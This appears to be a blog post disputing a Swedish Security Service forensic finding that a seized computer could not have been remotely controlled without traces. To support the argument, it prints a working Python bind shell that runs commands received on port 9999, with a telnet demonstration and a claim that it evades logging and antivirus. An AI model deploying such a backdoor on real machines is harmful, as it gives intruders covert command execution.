IT security specialists working for the Swedish Security Service Department of Information Security and Preservation of Evidence in IT environments performed forensics analysis on a computer seized from GSW and made the conclusion that it would be impossible to remotely control it without leaving traces, specifically seizure 2012-0201-BG25023-26. The problem is that they are wrong. The investigation report is originally written in Swedish, my translated version can be downloaded here.
The forensics analysis was isolated to the assumption that computers can only be remotely controlled via legit remote control services, such as Terminal Services and PowerShell. The forensics analysis focused on the services mentioned by the defendant and thus bypassed the possibility that, just like Nordea’s and Logica’s computers, the seized computer might as well just have been hacked unknowingly to the defendant; equal to how Logica was undetectably hacked for at least two years.
Yesterday, when Jacob Applebaum was heard as an expert witness called by the defense, the author of the report admitted that all contents of the seized computer’s harddrive had not been analyzed and that he is not a Windows expert.
The analysis assumes that only one firewall was present in the network: Windows Firewall, despite there being records of “plastic cover belonging to router” being handed over to Swedish authorities by Cambodian authorities. The router’s model version and firmware settings are uknown as it has neither been documented nor analyzed. Apparently seizing the plastic cover was a higher priority.
In their investigation the Security Service shows that Adobe Flash Player versions 11.0r1, 11.2.d202, 11.3.r300, 11.3.r400 and 11.3.402 had full permissions in the seized computer’s Windows Firewall rules to communiate over both TCP and UDP over any port in any direction. These versions of Adobe Flash Player are vulnerable to over 100 security issues which can be exploited to execute code through so called remote code execution exploits.
The computer’s Windows Firewall also allowed the Python interpreter to, just like all the other whitelisted applications, communicate over both TCP and UDP on any port and on any network device. Without going into further details in this post, here is a simple example of how a computer can be remotely controlled without leaving traces via Python:
import socket, subprocess s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # Bind to port 9999 (example) on any network device s.bind(("", 9999)) s.listen(1) # Accept connections from clients conn, addr = s.accept() # Loop forever while 1: # Read command sent from client data = conn.recv(1024) # Close link if no command is received if not data: break print("[+] Connection established") # Execute received command output = subprocess.check_output(data.decode().rstrip()) # Send output of executed command back to the client conn.send("OUTPUT\n------\n".encode()) conn.send(output) conn.close()
When running the script above it creates a socket that listens on port 9999 which accepts connections on any network device on the computer. It then waits for clients to connect to it, reads received commands, executes them and returns the command output to the client. It’s not even complicated.
As an example this is what it looks like when a client connects to the server and lists the files in the current directory:
> telnet localhost 9999 Connected to localhost. Escape character is '^]'. ls OUTPUT ------ server.py
In addition, the same scenario applies to another piece of software which was both installed and fully allowed in the local firewall: Neko.
Additionally the computer had both the OpenVPN client and server software installed enabling outsiders to connect to the computer and connecting the computer to additional networks, forming a Virtual Private Network, which is a globally routed virtual LAN. By directly connecting to the computer or by connecting the computer to an existing VPN other clients in the same VPN can share local resources, like harddrive storage, across the network.
Essentially it all boils down to that it is up to the software which enables remote control functionality to save logs to the harddrive. If the programmer doesn’t explicitly write such logging functionality, like in the Python example given above, logs are simply not stored to the disk. Windows does not write every network transmitted bit to the disk and unless someone logs their own backdooring it’s not going to be detected through forensics. Neither is the Python example demonstrated above detected by antivirus software as it is performing completely normal network operations.
You can obtain my somewhat lengthy comments written on this matter here. Please keep in mind that it was written under somewhat stressed circumstances where technological facts were more prioritized than human linguistic expression and spelling.
With more than 100 possibilities to remotely control the defendant’s computer without leaving traces, counting only those circumstances that paint the environmental picture in the Security Service’s investigation, it is absurd to claim that it would be impossible to remotely control the seized computer without leaving traces.
The authorities worked around the preresquites of justice when they first seized a router’s plastic cover instead of the router itself and later focused selectively on Windows Firewall. Analyzing the plastic cover would have had the same relevance as the investigation of remote control possibilities conducted by the Swedish Security Service.
Making the possible seem impossible is easy when the defendant’s documents are locked in a secret cabin and nobody has the ability to question you, but such actions does not promote true possibilities. It seems like the investigators were biased.